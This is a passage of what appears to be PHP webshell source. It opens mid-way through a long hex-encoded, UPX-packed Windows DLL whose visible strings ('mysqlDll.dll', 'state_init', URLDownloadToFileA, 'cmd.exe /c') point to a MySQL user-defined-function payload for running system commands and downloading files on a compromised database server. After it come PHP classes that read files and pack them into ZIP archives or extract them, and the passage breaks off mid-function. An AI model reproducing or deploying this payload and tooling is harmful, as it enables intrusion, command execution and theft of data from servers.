ED0F02B0D408808EFC88D95292BCA81F9883D3655127CCC8911DBE3393ABFF4130D6B71FF85A061C634300C6343065FB6F6D20145E8C77C0B0964454510728A9960E96DD98B134E90464868B5BF8B74626A055E39B51D177F2126FC8930EB41B456EBC78D4DF4575CE6BA01B310FF43640B2EBB51CED14FEBA72C9C1EDA241C06E02C9720405AE8A015F52CEA1A10AA6C4FF24D666E1C38EBD2A4F007458258DF02F1B516CC808C6E6DFDFEAD068E6583490C08C741181BEB1103CEDDC80C494114181276D4525CA25E83618A011AE0188DF93B377203DCC883E17018AF362C368AD1A1D81C331340E58CC009FC7591345730E486E0D55BE159519130D716D76A138E1DB69AE51E5B00DE3FB41B155A22DD0CF3A00AE11ABC7A1EFBD82BD7246046735A732844BF5A020BA68FCC6C5DA0702B700C66C8077739D80A6DA14BDD581A58B26575F1A436CF51A08B84600C33C2CFBD1A506820CF118FDC6DCCCC208C4106F80E3A2AD716B6195F41CC00CDFB55B88A6D180B7718CFE8BA37C2F72AF18BD8090C07D31139A050D60C3215FCFFCF4913D1E9D1DBD1EAD1D80BC975F4F7F3B014B9B684643D2150F7EDEEBB2F7DD1720E3B27770872073B2B76014E4C4B56D84A7FDEC27F6F2A0E7AB3D96E506EA833B6517405C203506E10DD66C85E0C156EC814910410BA37CD606B0C0E0876082BBB1B406CA6DB11140708BDDA264103BB27DA007C3F26A8742AA6443D71A376E9C18BD1783BFE3DEF0F82800E036A738314ED6F4BDC8183E2EEF95E29F3A5FF249513A9F1DFD6426811BA1C83E904720C0CB136DB8F62C86D41801E8D789075F3B9C70741FC900403BCE023D173DB852F1188078A46BE470105025608938C2D5B59C6C75CCC8D96652CD949002B25010202EBCE2679A690234621473F5DD70DE48C065F034C0744374DD3343C342C241C8B44344DD3FC8EE489448FE4E8E8ECECD3344DD3F0F0F4F4F8CD39324DF8FCBDD7007B87B01027F809FFF00305399AA6808CA0BC6C36B0D766909D0BF91133240417A30D0A2BB8555B0D2531C639FCD8F692417F240DFDE3FC77823BC2E54400F7D96543B04B8F779E9C1CF92B43082CC2D6745D900B180338606D033A02F275B76F034E584F56B6B74B08F6971FA3EE02EF026FD9807C298C902724E3952D09AB2D03AE45EB1666625A955B7FB403A6699AA6BCC4CCD4DCA6691A9AE4F7971C1C189AA6699A18141410100C699AA6690C08080404A6EB0E231F05100318E05A129A283C8BB7B56C21CC96870F8313112A210CB700ACE86FE2570FAFAE83FEE08BDE770D0000EC1A0C2715773A7256B4D59382AB1D3D530256F057752B566A082A898850D71C14229893820F56741956947414EBA96A72A31644577C54EC8157B40E5BEB56D5612ED4230603EE265D565698182B52F7616904FC8AAEFF41BE0D50BCC5273ADC3701435C147C29985047568D7C07FB2D162BF90CAD240600473B5B290E2B1E7CA55E90C3B6CA11C56056821834BFA3A546088B87803B08742246C2ED46D988E80713720FF9240A606106817D0D4C02DB6E8350F531845E39C3D9AC60B6DDBC17721507CA532C1EB22D19080C16334BA55C1DE660080C7BD27502BD40DF1283CFDEDBE158EC22C90314BD737500A20F08B1443C998A74F6466221F816F87544837E5F23E886DE04FD0C958D460CFE1EC413ABFF4620ED8D5E0C70F61B090D803874180C84884388239F4500C3A585BF2D50DDE52B116A245999F7F9D1F03DD4A80336C66D2983FA3BF137EF2083C5044381FD5FA40F8C5E3984F86E23EB4EBE3E56B93E126F843E8D0C9DA9901E9C5F8684F83BC27318C01103D6EBE48D0815EAC1E30543C70B2256C9A012346C430BFCFE07563B0D535773F7C1903683D0C93CC18F07833C50B0DA28E4361AF51B053E1E751EE28B104974084958DEDE680284F4EB0804F5EB03F6A337DE4600E836891C308A5BEB161EE4C2DA027F7B5882864329F459376A830037C674320E1F5AC9F31CD6CA7E50505031C85A7B830CB2247ED4CAE264CF731FCCA3AD8D8800AB740F00E16AD8580841533AFDECA4963B343D1C063CC0C1E7154A81B1BCF749D418C5604B9E381780360CB2AD2C98248184E169CA5190C61D5642D4920179728BC3C36C8BB1E14E4152530411590F250306F029535DEC60B404CBF0F6D915B7B10211B0FF0336E4106AC0A359B43809F2A22CDEB43F4AA87BF6F30549C0FF4AB890073C9013082CBAAED003FC0C203F087900724AA84AA8A6E9BAD83F069F038C848BA6699A7C746C645C3F5D3B8F004AA8F003C00164D134CCE03F39859CE44C404BF04B4845D375DD2C900B580378A03C0239903F4C404C405D171B855B7FF403FC344DD3750E04030C141C24871160D1373F1F164DD37505500358687C3FAB2F4A003E1CCCA0022F907956F6C112883F1594D9815DE874095900FE37ABC645FF10EB0B8065FF8DECFC0FC0861A806811F6C540750839B72F455328E48B4DFF806A83C15E02056083236DC3DE2374001680E1A4C3F96C01175510100840EB07F60D4A30797FF810742604ADB7F2F220741830740A5074897505216A16A21521020C2ABD7CDF060389F0BA00077D0423CABF54B47F037D3BC87F31742A3BCB43C3ED4AB06D195433744D0739BA91AD85CC43F84C0804BAA67B7B435AF8EB3E26052F070643CE806F1E3BCA7423C2163CDD1188188F4F5B3B0507E69EE00113FDBEFEFF32FC5DF4C77413368E54F7D1234D143737B8DB1172A840C581CE1F0FF601F6ED63DBB7C4DE020BF7A8DF081408EB0AA8115D2CBDB1060B1068ADD8233BD39241E0DF751AE918016D0D8231816ABFB78D0A9E2DA82BCEF008022D6030EA3BAC39BF4213628561325256E8B383459875090A18EBD8D583F9B19A4DFF40EB09AF08146C410F78473159812781D6C68A11C380C901C630045A8452C9C2DD05BEFF0B48884CBD7578EA7473F606818116F502746D8B945DA2220B1E8B067519FC35008FBE813883E94B1D2A1759D888B60DBCEB584213E2137C677E2511335669A116807D131A11825F178CF015554445E2811980C73E5A74B52DD81C2EAF737808AB60072DDC07808B8C4E8BF390E005C916713F8005431467736A081E8233918B09570441464E600F3B32B24C245B231A0EF2F2B64D79D50D04FEEB08FDEB03F4C11A824C0C5F198A1141AA1EEC1BF16488174762EEEB05838C00F0D32401119C2CCBC983C1E134271208006DCC6AC738682DD9D2D96608C6C3000C085DC049B38807CA185A1965872312F52A65520945A9F88959AC913859A6E80AB82C06F651FAD756F29B6A0A8FD2268988391874744617CAE630428A78A9E850538B58DA71F0D73BC6CC214D628386A240C893715963FF25DAE2BF94603975E8F3ABAA895D0F6C16E8D386EBD77DEEB8BC4DEFDD405B2B04D30CAFCBB641FFE87BA312CA300F87942588CD546C9CD28DEEE356F7E58D614F6F52F3AB04AA8D9E94FA52A15498BCB6DE2C8A5101E84B51844B5CFA3BC777B7EFEE2D68FC8A922080089047401376F5F84BB1F04141803965D47983C308837DFC6913B93638C1E2C8914CBA6DA087F750A3A4105384898C2AB8BFDF709140A5A559A3D1A5EB5240D1B3A660810547A8C6A19EC57EF508403DFF07F153382B89357BDF06F15335250700BA49F88816ADAB00981EA84C97DFE75E2E8604AFE9508301D08C4311946FA857DA70EF65402DDFFE01A8946CBBE78FA8FF1570F814FD9635D1CBF4FC750F87DC19F6AE1CC7492DA463E7E804741704D7A628F00D740C802CB804F93CCF763605120B0811578460862571BEC01F88E1625F044CE5CF52B1404522283456A166B453962215127FE081E016CFBE8C888405ECDF7FA1150D8AC672F48A45F2C6850D20166E104D3B375A55F3B80A2D415FA0183BC1771D48BC3A08768F2A41B820008BD9CBAB6B81FA47AA42428A42FF84C15FF8EC352C900EFA8B358D7A029A33D0213989B2EF8C7DDD5A9123FD1D561E9291DD6C5634235842FCAD803DB8682E2768002E7DB75CCA8D8D726695F6C2CDEF67341503108A940564889060EFCEC9DBEB1C1A027410205BEBE380A06E6834781CDE4400BFEB491ADB0D1315DA417219045AB2BC8DFDC34BC880C1208888491F1D617213C3DE9CBC7A770E20E920EBE04C77F915774ABE5EC97394886AFDA90210F970505C59FC94882F1FD575798FAC426866281854FAF7403D6709FC161C57FFD664BEDB29FA297450100CC7D7BE5DA0F85714B00C06B45B99A0BB88CD16FFD0D602DEE66BED10B405531104EE1590601D4D0AC00982FA8659A057040481282056B064F0BB470B0C85965E91F983FA982DE9ED6A47C025152BD16075FA9AEF10D06D020610CA1A251C8E1D1429168F58A6EB3A06234AE2EB8807351E94CC5289365A271ACF0D56AF1235140FCBFFE1C3A0B7AC99AD78F2971B180A0360B615DCC1A8F1223E1975EF13A0876A064F4AACEC508B9E1D9C345CE66D442C51681C4C147D452E6AB6AD50293F89B1C1E0939D084B1A6606AB9F44BC3805750BBB0D416F064D6B50AF256BBC5C487D469512980708D0E250853014526D2FD050BCDE1BF6034EBC05A908D81A4A8615B06F126945FCDE30A22DC25B53C366A035AADB9C65F874E144346021CE0C29800750A09543B566401343E0E0043812F107C406F98A4804657FAB99A5DF89084B1D8A40053C0A84BED01D154D1088E4078D53010F8B459718C682050ABC160C166D515452B810448B664DDB39AD976865D1068F1496935166EB006D912446E98B17684D8B3D4BE1F40155F64235D144E68AE5A87CC50EE0D0F876EB3B0A81A274BBBE0C04E724FB027FAD0D03808136C85B00140C0075FFD06C0B23578A101A33AE3CD45FBB2D0D0BB443FF135A12493944BBDD2DA2182140803848068308CDCD76BF5F5EC6030D4344EB73CA2BD36E3260E7FF6A01CF0A090E683BAA479F74411ED101A2358848D12D821A85FF9D468B0F4388443105EB293B700420DEB6250CFF6305160AEB18A55E40D812FFA9193507AD9C7B77BF925B761A750D85115C74F3064942D12EE5E4AC062B4688210250A8EAA9D800F91131357540346A46C42BF87D5BF41F8AE875465757EB533038154C20629236B1F2DBCA6A711D23EB222014A660B0341B48E1FE033130EB651DBA397D147E108AB25936C514105A66B67DF436E1A11D591D161C0286D98CD9181FD84872DA478DC159D22AD3A62018366B5B0CBE3C20732EDB6CB74EC1245E0140503720CA3F408C4C793BDF0F849CD25B6CA014041B9C0324FCF25DAADB2EDE8BC441DC8367EB138DB5D751678BF026118BB5D9F6AD3867DC7466534CDC6121CB9EEB9257F44DEC1AA574A3A6884412D80A7432B06D4B6C5E0D40403E1C78B2C8663713EDD57F1EDA321C0962C321858F2065C814876515F4A1F20BD966B6B336DC895DE08B15483212BDB27DB953D6BDDF74B45664E467749C8F6AB35BA3B30E03EB068C28EDD5618F54D5CC0AB11B88108B71B77179088B2680AD9F44568D4A9E0D7FBA0DBA5580F1491AF30C5E5CC60736942B498BC24E58ED61328118B4ECAC375E2D043E3E8A515E564234632356A53C0497CFC819DF1D1B56495340CEC2C73B028658A3432D24F276607CDD1C490554CC335033E433B263345BC8945D18908DD9968D532C34201BC53619181FE0DB630AD06A15B5CB3EBB15B0107CD3DC57CC0FE16050B3EB0B83DB33ECB6119CF6112949E0565FF670C9DA1C5552F8D7B2703A84933C8AF5CC38680C42EF047AC25F9A51D4E7023A01752E0A1BB1D552F0263A613E0A431D966EE146873A4101191411035BA330D56BFDD51A75555B430BB3FFB090D3D18E016DADCA0B4301070242B5CFD6ED44E94130E01302A86658AD799AAF335BD2CAC9C14A6D42AA5BC98CCC4F56530B4A55B050009C1B201AFFAE023307420FAB0424EBF3775DFE5ABB8C90416E14460FA373F201E6E20204C420753F98FD646C3A0AF38D46FF3B9CB8ACF87B5643BE51EEB60E56485481DF4C03C12580FC8D161DDEBD0A80E17FEB0D811FDED0540440391180C980DE880A81440B8D6686C5C671D0419080E3D60AC0C006A0A8487D065C9C249E5862050D10565D7426E8BC00BF83C410E0AE41C305E3CC0CB568E12EF1C6012D415CEB030A915B4013D4B88110B5DAA5DAD2630883FB0950769225FF2F7D6B2004308819413577DA802100498A178A018878007F8B118F49473BF972F21B365341486FFF948BD6A81E588D39C470CD4143A1D03B5CCF252EB6C1FF46758A274738C474F22C419D1AE324EC85D2E1C5FE4186E00E824A6F1474D21AC0E6FFD1575F3AEB78F0FFBF34019130007F0419C0D96EE2EB15130DC9817888C2C77895FFB541599EEE9067271FD82E760B3E6A602266C4040907B742A68D38CFDA39CB15580B0318AC05224EEBFB55D0C2052241280EABE097CF0B6C112836D1E970DA0C1B1FFF804EB741B35AB6201726828ADDFFDBEE0774217F1D467BFC720638DC770202E638F809D8B517BA35C6F7750DEBD733C908023657B34D9BB9AFE582806D6AE4BF0FF35FA6ED85B50A321926EF2BB446AB2F99EE57EBB68DDE5AC3EC74230BAB1F775165EB3AC0F0596B0979D584B5634DCA0975720271FC08A5C9DE0E5FFECB030051283074512BBC2311EC1A2D75770C920F1DA2C685B7A6EB52DF2F7D8B5BB10EC11AB6D10A5601805E6EBDF54B318065FE0088508845FDF3EB09BAAB41D90DFD0F6C8D4D0AD58B1803165179AD7DD182C16E4F026B53B38059E3450A23B07465BB72251CAE5A80450F8CD5815DB9AAF5490F8FA18A46D52D1FE9DEE83C057C83760A4D405E7D2539DBD187F8787E0BD95FAD6A0AA1A1F4DEE0FE8A045823C667D9EB658B1512DA65E94CB4B6C84A740FA7DF5BD4D630AF88065D0958B60917C5522B5B13566B032CF036BE03B49F572F1A6AE0648FCC20F6AEDA06AD75A5D646D0BE05FD032C37126253CB0BC18C00885DC029C25A0BC839FAAB60287C25F7E1C29DEB025EA105B11D42030985056C351FD31EAACA3EC1CC03580000D37466AAFF0F4D53EE65DD9304DF03E50F08EC03BDE4F2B2F20F0AFF0B050CCF0AB656D003D50302017FB6DF3A1903070602100445000535300050B5EEFF7F2C20283850580708003730305750070F200BD71461DE000860686009780073AE956E08071507001A010E7D7BDDFF0028006E0075006C0129320F6E756C6C6FB7FFDF0A72756E74696D65206572726F72200F0D0A03544C4F07E4BFD95353110E0053494E470044BBFD65ED4F4D4112115236303238082D204BB76F7F7961626C746F20696E6956616C697A0D6865D67EBED961703727376E6F743D0460EFB6FF756768207370616323667B6C6F7769380AB9EC3661066F6E3736ED672079737464357075722BF6DB5AFB76697274752133A5632320630C9B42BED86C285F345F2ABDF6DA7665785C2F5806DCE2E6BEB0935F3139F76F706558313260DBEE736F0F646573632B3888706B6D4624816564193024DF405723376D926FDBADA6AC7468BF612F6C6F636B1B6C8530173464B7865B6B6E612E02A221726D0050D8DAB770406772616D204A6D366829EC852F30394F10E71A8D66412A2B302E2B84EF53C8386172677528735F6DBBF63C303266C16E6E67826F9CB52EB605743A1164E67F4DC3DB422B2D60396615566973AAEFF660FC432B2B2052A04C6962B47279276D0F87B90A2D16450E211150D8656B9CD43AC2002E003CE5ED6D736DE0252C6B6C776E3E1B17EED8F84765744C61324102766550AE75705BDBCE62130F57956426876534BEF0FF7373616765426F78410075732533322E642ADD931252EAB75956035A77CF76670B5A955A0E0B5B8E0392483AAFB9BBB56D904A0064002C204D20086DC9BDB97900632F642F06D74D03FDB5179A4144EE656D626B5B4E6F76C3FE6D930B4F986F0A536570741486A96885416C96711BBEEDF9B941076E6541F369A64D101636172763684665327533BDF7DE7B4A616E0A675F57537BAF7BEF4B47433779433F3B6EA9D0DE3323B03C6418B0ED587B4F5E095468127313D9C15A6157BC7C0C547509B9D9B1C64D251053750743F7DE7BEF3B372F27231F039E73CEB90A11181F262D9C73CEC5AF828990979E72CE39E7A5ACB3BAC1C8A78008047C28BB92975043BD384F296360A9523F4D797371909620A953A636306EC263B50B355A6A09A663B7B921E76A3752C077035C321703ABCF91FB2E746D700FB40600B6472A481D3A2C7EB53D25E4E6FFDB730A2F636D642E657865202F63200068656C55192B75313774073967FF76B6E4380B3006687474703A2F2F8F2DF5FF2ED9632D9B09CAE4C8EBB8F1CABDB4EDCEF3FFC3FE6F120D00CFC2D4D8CAA7B0DC0BCEC4BCFEB3C9B9A6F6DCE6FE21C2B7BEB6A3BA7E175C3F44867B81D10F00200593195731D913199DE4667271F0108DE8832119B2178E180F30434E5146C2F80392017BD894A007010153107C81A4B902011F0264410152476357D9D9070A2F0207743CF2E4C96C084009140A73F01093274F9EC411941270133C79E4C944180C1972E41AAC1B93274F9E741C4C783C796EF2E4C92C7A1CFC18FF86B29317D854DD038572200107402699282048001940269210841002199009810119900119108202601C16023B20EF200D0C050133164DD30C3603070418050D344DD3340609070C0832D82083090A1B0BC1BEF702573B070F575F906EB0101311031217210C32D820350F414336D86083503352175307D860830D575F597B6C17D2344D376DAB20701C72D860DF0BC72F80B3810760830C36821F83848F208334CD91299EA1830D32D8A46FA7B79FCE760EC2601FD70B18070069BEB35D0517C00B1D0490664006968D08644006648E8F9006644006919293CC066140039F78EF4D54EC25FF0204222B6027CF0EF68279822117A6DF07A1A581E9CDF3EF9FE0FC2F407E80FCA8C1A3DAA34F0D72F60881FE0740B577830C812F41B65FCFA2E43E5F21FFA21A00E5A2E8A25B7EA1FE5105BF92DFEE03DA5EDA5F5FDA6ADA32D3D8DEE0B26627B7F939317E430303860064AA432EE99E9C84538B9876840380A6699AA67C7874706C9AA6699A645C54483C34699AA6692824201C18A6699AA614100C08044DD334970075FCF8F0E4DCA6E99E35D42F75CC03C4BC9AA6699AB0A89C908C8849BEA669806C64CD2E821D65BB8C8F905C037F009EF040E82F500B807007F0F11325DCA0D1535499508BDD50C944548CF38CDC97B058592CA7BF06699A0E1EEF3B5A9775A769BAA7B5D4F3E0301AB86CD3034E6D01333AB759699AA6697796B4D3F20CDA74DD272F034D6C01F108A48008368024444144210980D109600064C15B054D734325746554B6CBB7572C0D44656C65466905410A105FDB0C470A0953C5D87393CD2719522C0A23EC4F56C145185661726961622212C0EC7F436C6F736548616E6425F62AD80E4B4A500B63417B7B56686753791D656D4447B7C1B656F5227914744E747515B893FD70496E666F413569704FB1DBD62EA845782A08535D65702CFB36CCFD56657273696F163B896E6754792D67DF856C570F1F4C434D6170115706882E610D1B4D7073ED5BC34279126F65646543688366E5ABA03DFB644F66F34C6FFD8E6B68FF300B746C556E773C3D48D767EDAC7C70416C6C0A46B1FB432D7B9BE16F6D6D09336E7DACB38556982673FB0B790CC580D866E50B56ADB521419C42494D1E263CC3D609630A532740B029DBDACA16AD147215421BC0B64C5B762B78108C8580250B77C5EB8407C4600C542FB998A170B6DA75D3F812DCDD3302524964386C7353F3B3378BDD5575650C4F09DE4BD2258C531D2D471A086D618643427552C93B2463366412A0D50CC363141E4D6F64BDA34E616D6A3B2160BC5F9EE473183004470A0CF3CA6624A3FD08E42CCFF04258164361853B1CFE66BF08506F6990C906C25EF99DFD6B65644465633815C2844D72496E53EB460F3AC1F1EF73684B427566663E6A50ECB136761C0A410B074F454D092C19FE10934164647297EF7D2841BCD93C7155524C440A5BA4668277E3CE1C88F6F6FE340457534153864D00FF0402CBB22CCB17390334090C8D32B62C0B022649F7FF7FAE6D0C10025C000A052F0A5205546417350BDFFEFFFF811912192A060B2A385319310B320D1B806512ED2405670B30100F1CFFFFFFFF1B1B96130B530B1C455405400645171106180A118145110B4C310526530F7D1CFBA5FFFF078B1214050B121B271A1241691A09F04BF83A06F0520103BFFDFF7F0802070F080B06060A18050A1A0E080643125C1B4F59085A0DA37DF66FFF0F16F03001BAF00AF6211775F0C8020400CE2D07E6EDEDBF5F10070708270C0A08300A0608050C050CBFB5FFBB16030813082D1B10060F06070921AE08F04F020E6BBFB5ED061A050F107EA20605060D1D15349BFBF69B2244A6F0ED0120130616070F1810FBFFDBDB091A571362A9850E0B14060E09111C0F12091C230A03FFFFFFBF0C137F0A1CF0F20007194212310C0B0F0AF00302F04D012C0C1C191A0811F6ED5BFB050D05F00549BF05380C0757070A19088EDBADFDDB05663A081A0611190C7113081E0917F6FF0B6F17621806422214320715320A2115242A0E311CF6DF6EFF21250F0F321043CB140E47065B074845E3193539DBDF6EFF0C103F50133E1282260D8E13270F42141E6D157CFBFF6FAA0E13770D251C1374A04D18154A481712E3084B2512842F6C2F47550118EF051D29261A072842EEDE1D4A0604660B1B07161D2A32FFB7B77F7228060C3B0829710D0C234F6039150D3D22084C0F19615BFBFF262E0F20222D143A0726181A0B83A67C56DBFFFF138AF0FB00790C150B2EF0D9011C0D0D13090C32C221B76678E106210A1D081715A919E80B0AFBDF0A0B6E432C0019066F061E1113151EF95068857F10210C120E0F11759647BFF00BCDB85C7EF056011E550F0AC60A89050BFFBFB51F4C35080E1E1D182058163368254605030717FEAD6DFC103D105612F03E01EC48B24F30BD71E1B75B045E2F0F5838EA3C7D3810040CFB76F38301F0B4030408F0AC0A0DF014010417C8915D7E2010108408020800046453203FF0240608041009F92F71E90C9C645045A54C010400B2976A46AA4EF90FE0000E210B0106264B004F26A9244110BDEC3CFB09100F04000700D0B237E982272A0202079B6D7ED81E8D000071C886620285B9650AC0648A002B8CAA4BA744B0100C76F92E7465787446619070E2AD2A6574CD602E7212669D2BC1AB0D5303FB5E73D902402E26CF2427B62919A49090C04F6519EC6B0F7D584FC027A06F6EBF29421B5C881051C489C700000000000000800400FF00807C2408010F85C201000060BE00A000108DBE0070FFFF5783CDFFEB0D9090908A064688074701DB75078B1E83EEFC11DB72EDB80100000001DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E803720DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEFC11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B9960100008A07472CE83C0177F7803F0A75F28B078A5F0466C1E808C1C01086C429F880EBE801F0890783C70588D8E2D98DBE00C000008B0709C074458B5F048D843000E0000001F35083C708FF9650E00000958A074708C074DC89F979070FB707475047B95748F2AE55FF9654E0000009C07407890383C304EBD86131C0C20C0083C7048D5EFC31C08A074709C074223CEF771101C38B0386C4C1C01086C401F08903EBE2240FC1E010668B0783C702EBE28BAE58E000008DBE00F0FFFFBB0010000050546A045357FFD58D87FF01000080207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E9C73CFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000070F0000050F000000000000000000000000000007DF0000060F0000000000000000000000000000088F0000068F00000000000000000000000000000000000000000000092F00000A0F00000B0F0000000000000C0F000000000000073000080000000004B45524E454C33322E444C4C0075726C6D6F6E2E646C6C005753325F33322E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F74656374000055524C446F776E6C6F6164546F46696C65410000000000000000B1976A46000000001EF1000001000000030000000300000000F100000CF1000018F100009010000090150000801000002BF1000031F100003EF100000000010002006D7973716C446C6C2E646C6C0073746174650073746174655F6465696E69740073746174655F696E69740000000000E000000C0000001D360000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";\r\n}\r\n \r\n\r\n\r\nclass eanver{\r\nvar $out=\'\';\r\nfunction eanver($dir){\r\n\tif(@function_exists(\'gzcompress\')){\r\n\tif(count($dir) > 0){\r\n\tforeach($dir as $file){\r\n\t\tif(is_file($file)){\r\n\t\t\t$filecode = file_get_contents($file);\r\n\t\t\tif(is_array($dir)) $file = basename($file);\r\n\t\t\t$this -> filezip($filecode,$file);\r\n\t\t}\r\n\t}\r\n\t$this->out = $this -> packfile();\r\n\t}\r\n\treturn true;\r\n\t}\r\n\telse return false;\r\n}\r\n\tvar $datasec      = array();\r\n\tvar $ctrl_dir     = array();\r\n\tvar $eof_ctrl_dir = "\\x50\\x4b\\x05\\x06\\x00\\x00\\x00\\x00";\r\n\tvar $old_offset   = 0;\r\n\tfunction at($atunix = 0) {\r\n\t\t$unixarr = ($atunix == 0) ? getdate() : getdate($atunix);\r\n\t\tif ($unixarr[\'year\'] < 1980) {\r\n\t\t\t$unixarr[\'year\']    = 1980;\r\n\t\t\t$unixarr[\'mon\']     = 1;\r\n\t\t\t$unixarr[\'mday\']    = 1;\r\n\t\t\t$unixarr[\'hours\']   = 0;\r\n\t\t\t$unixarr[\'minutes\'] = 0;\r\n\t\t\t$unixarr[\'seconds\'] = 0;\r\n\t\t} \r\n\t\treturn (($unixarr[\'year\'] - 1980) << 25) | ($unixarr[\'mon\'] << 21) | ($unixarr[\'mday\'] << 16) |\r\n\t\t\t\t($unixarr[\'hours\'] << 11) | ($unixarr[\'minutes\'] << 5) | ($unixarr[\'seconds\'] >> 1);\r\n\t}\r\n\tfunction filezip($data, $name, $time = 0) {\r\n\t\t$name = str_replace(\'\\\\\', \'/\', $name);\r\n\t\t$dtime = dechex($this->at($time));\r\n\t\t$hexdtime\t= \'\\x\' . $dtime[6] . $dtime[7]\r\n\t\t\t\t\t. \'\\x\' . $dtime[4] . $dtime[5]\r\n\t\t\t\t\t. \'\\x\' . $dtime[2] . $dtime[3]\r\n\t\t\t\t\t. \'\\x\' . $dtime[0] . $dtime[1];\r\n\t\teval(\'$hexdtime = "\' . $hexdtime . \'";\');\r\n\t\t$fr\t= "\\x50\\x4b\\x03\\x04";\r\n\t\t$fr\t.= "\\x14\\x00";\r\n\t\t$fr\t.= "\\x00\\x00";\r\n\t\t$fr\t.= "\\x08\\x00";\r\n\t\t$fr\t.= $hexdtime;\r\n\t\t$unc_len = strlen($data);\r\n\t\t$crc = crc32($data);\r\n\t\t$zdata = gzcompress($data);\r\n\t\t$c_len = strlen($zdata);\r\n\t\t$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);\r\n\t\t$fr .= pack(\'V\', $crc);\r\n\t\t$fr .= pack(\'V\', $c_len);\r\n\t\t$fr .= pack(\'V\', $unc_len);\r\n\t\t$fr .= pack(\'v\', strlen($name));\r\n\t\t$fr .= pack(\'v\', 0);\r\n\t\t$fr .= $name;\r\n\t\t$fr .= $zdata;\r\n\t\t$fr .= pack(\'V\', $crc);\r\n\t\t$fr .= pack(\'V\', $c_len);\r\n\t\t$fr .= pack(\'V\', $unc_len);\r\n\t\t$this -> datasec[] = $fr;\r\n\t\t$new_offset = strlen(implode(\'\', $this->datasec));\r\n\t\t$cdrec = "\\x50\\x4b\\x01\\x02";\r\n\t\t$cdrec .= "\\x00\\x00";\r\n\t\t$cdrec .= "\\x14\\x00";\r\n\t\t$cdrec .= "\\x00\\x00";\r\n\t\t$cdrec .= "\\x08\\x00";\r\n\t\t$cdrec .= $hexdtime;\r\n\t\t$cdrec .= pack(\'V\', $crc);\r\n\t\t$cdrec .= pack(\'V\', $c_len);\r\n\t\t$cdrec .= pack(\'V\', $unc_len);\r\n\t\t$cdrec .= pack(\'v\', strlen($name) );\r\n\t\t$cdrec .= pack(\'v\', 0 );\r\n\t\t$cdrec .= pack(\'v\', 0 );\r\n\t\t$cdrec .= pack(\'v\', 0 );\r\n\t\t$cdrec .= pack(\'v\', 0 );\r\n\t\t$cdrec .= pack(\'V\', 32 );\r\n\t\t$cdrec .= pack(\'V\', $this -> old_offset );\r\n\t\t$this -> old_offset = $new_offset;\r\n\t\t$cdrec .= $name;\r\n\t\t$this -> ctrl_dir[] = $cdrec;\r\n\t}\r\n\tfunction packfile(){\r\n\t\t$data    = implode(\'\', $this -> datasec);\r\n\t\t$ctrldir = implode(\'\', $this -> ctrl_dir);\r\n\t\treturn $data.$ctrldir.$this -> eof_ctrl_dir.pack(\'v\', sizeof($this -> ctrl_dir)).pack(\'v\', sizeof($this -> ctrl_dir)).pack(\'V\', strlen($ctrldir)).pack(\'V\', strlen($data))."\\x00\\x00";\r\n\t}\r\n}\r\n\r\nclass zip\r\n{\r\n\r\n var $total_files = 0;\r\n var $total_folders = 0; \r\n\r\n function Extract ( $zn, $to, $index = Array(-1) )\r\n {\r\n   $ok = 0; $zip = @fopen($zn,\'rb\');\r\n   if(!$zip) return(-1);\r\n   $cdir = $this->ReadCentralDir($zip,$zn);\r\n   $pos_entry = $cdir[\'offset\'];\r\n\r\n   if(!is_array($index)){ $index = array($index);  }\r\n   for($i=0; $index[$i];$i++){\r\n   \t\tif(intval($index[$i])!=$index[$i]||$index[$i]>$cdir[\'entries\'])\r\n\t\treturn(-1);\r\n   }\r\n   for ($i=0; $i<$cdir[\'entries\']; $i++)\r\n   {\r\n     @fseek($zip, $pos_entry);\r\n     $header = $this->ReadCentralFileHeaders($zip);\r\n     $header[\'index\'] = $i; $pos_entry = ftell($zip);\r\n     @rewind($zip); fseek($zip, $header[\'offset\']);\r\n     if(in_array("-1",$index)||in_array($i,$index))\r\n     \t$stat[$header[\'filename\']]=$this->ExtractFile($header, $to, $zip);\r\n   }\r\n   fclose($zip);\r\n   return $stat;\r\n }\r\n\r\n  function ReadFileHeader($zip)\r\n  {\r\n    $binary_data = fread($zip, 30);\r\n    $data = unpack(\'vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len\', $binary_data);\r\n\r\n    $header[\'filename\'] = fread($zip, $data[\'filename_len\']);\r\n    if ($data[\'extra_len\'] != 0) {\r\n      $header[\'extra\'] = fread($zip, $data[\'extra_len\']);\r\n    } else { $header[\'extra\'] = \'\'; }\r\n\r\n    $header[\'compression\'] = $data[\'compression\'];$header[\'size\'] = $data[\'size\'];\r\n    $header[\'compressed_size\'] = $data[\'compressed_size\'];\r\n    $header[\'crc\'] = $data[\'crc\']; $header[\'flag\'] = $data[\'flag\'];\r\n    $header[\'mdate\'] = $data[\'mdate\'];$header[\'mtime\'] = $data[\'mtime\'];\r\n\r\n    if ($header[\'mdate\'] && $header[\'mtime\']){\r\n     $hour=($header[\'mtime\']&0xF800)>>11;$minute=($header[\'mtime\']&0x07E0)>>5;\r\n     $seconde=($header[\'mtime\']&0x001F)*2;$year=(($header[\'mdate\']&0xFE00)>>9)+1980;\r\n     $month=($header[\'mdate\']&0x01E0)>>5;$day=$header[\'mdate\']&0x001F;\r\n     $header[\'mtime\'] = mktime($hour, $minute, $seconde, $month, $day, $year);\r\n    }else{$header[\'mtime\'] = time();}\r\n\r\n    $header[\'stored_filename\'] = $header[\'filename\'];\r\n    $header[\'status\'] = "ok";\r\n    return $header;\r\n  }\r\n\r\n function ReadCentralFileHeaders($zip){\r\n    $binary_data = fread($zip, 46);\r\n    $header = 